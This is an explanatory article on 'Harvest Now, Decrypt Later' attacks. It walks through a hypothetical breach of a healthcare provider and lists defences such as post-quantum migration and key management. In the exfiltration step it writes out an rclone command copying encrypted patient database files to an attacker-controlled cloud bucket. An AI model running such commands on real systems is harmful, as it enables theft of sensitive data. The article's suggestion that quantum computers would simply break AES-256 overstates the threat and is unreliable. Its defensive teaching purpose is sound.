Articles

Harvest Now, Decrypt Later: The Quantum Threat

March 15, 2026 6 min read

Harvest Now, Decrypt Later (HNDL) is a cybersecurity threat where attackers, anticipating future decryption capabilities, steal encrypted data today for later decryption.

Imagine a bank vault, and you know that in five years, a master key will be invented that opens any lock. HNDL is like someone breaking into your house today, stealing all your important documents, and hiding them until that master key becomes available to read them. In the digital world, these "locks" are encryption algorithms, and the "master key" is a breakthrough in cryptanalysis or the advent of quantum computing, which could render current encryption obsolete.

Here’s how it plays out in practice:

An attacker gains access to a target network. They’re not necessarily looking to steal data for immediate profit. Instead, they identify and exfiltrate large volumes of encrypted data. This could be sensitive customer records, intellectual property, financial statements, or any other information that is valuable when decrypted. The data is then stored, often in the attacker’s own secure infrastructure, awaiting the day they can break the encryption.

Let’s see this in action with a hypothetical, but realistic, scenario.

Scenario: A Healthcare Provider is Targeted

  1. Initial Compromise: An attacker exploits a vulnerability in a web server hosting a patient portal. This gives them a foothold into the network.

  2. Lateral Movement & Data Discovery: Using stolen credentials or further exploits, the attacker moves through the network. They locate a database containing patient health records (PHI). This data is encrypted at rest using AES-256.

  3. Data Exfiltration: The attacker doesn’t try to decrypt the PHI on the spot. Instead, they use a tool like rclone to copy the encrypted database files to a cloud storage bucket they control.

    # Example command to exfiltrate encrypted database files (e.g., .bak, .mdf)
rclone copy /mnt/patient_db/encrypted_data/ remote_cloud_storage:hndl-bucket/healthcare-data/ --progress

    rclone copy is used here for its robust handling of large files and various cloud storage backends. remote_cloud_storage would be a pre-configured rclone remote pointing to the attacker’s chosen destination.

  4. Waiting Game: The attacker now possesses terabytes of encrypted PHI. They don’t need to worry about immediate detection related to data theft because the data itself is unintelligible. They simply wait.

  5. Future Decryption: Years later, a new cryptanalytic technique is published, or a quantum computer becomes powerful enough to break AES-256. The attacker then retrieves the exfiltrated data and uses their newly acquired decryption capability to access the sensitive patient information, potentially leading to massive breaches, identity theft, and regulatory fines.

The core problem HNDL solves for attackers is the temporal gap between data creation and the potential for its decryption. By harvesting now, they bypass the need for real-time decryption capabilities, which are often the hardest part. This strategy leverages the inherent assumption that current encryption is secure indefinitely, an assumption that is increasingly being challenged by advancements in computing power and cryptanalysis.

The key levers you control in defending against HNDL are not just about current encryption strength, but about data lifecycle management, access control, and the future-proofing of your cryptographic infrastructure.

  • Encryption Strength: While AES-256 is currently considered secure, the threat landscape is evolving. Post-quantum cryptography (PQC) algorithms are being standardized to provide resistance against quantum computers. Migrating to PQC algorithms for sensitive, long-lived data is a proactive defense.
  • Key Management: Robust key management is paramount. If encryption keys are compromised, the strongest algorithm is useless. Implementing strict access controls, regular key rotation, and secure key storage solutions (like Hardware Security Modules - HSMs) is critical.
  • Data Minimization & Retention: The less sensitive data you store, the less there is to harvest. Regularly review and purge data that is no longer needed according to defined retention policies.
  • Network Segmentation & Access Control: Limit the blast radius of a compromise. Segmenting networks and enforcing strict "least privilege" access controls means attackers have a harder time reaching and exfiltrating large volumes of data.
  • Threat Detection & Monitoring: While HNDL makes data theft harder to detect in real-time (as the data is encrypted), anomalies in network traffic patterns, unusual large data transfers, or access to sensitive data stores by unauthorized entities can still be indicators.

One aspect often overlooked is the impact of software supply chain vulnerabilities. If an attacker compromises a widely used library or tool (like a database driver or a cloud storage client), they can inject malicious code that silently exfiltrates encrypted data during normal operations. This means that even if your encryption is strong and your network controls are tight, a compromised dependency could provide a covert channel for HNDL.

The next threat you’ll encounter is the sophisticated attacker who doesn’t just steal data, but also plants "living off the land" binaries or scripts to make their exfiltration look like legitimate system activity.

Want structured learning?

Take the full Cryptography course →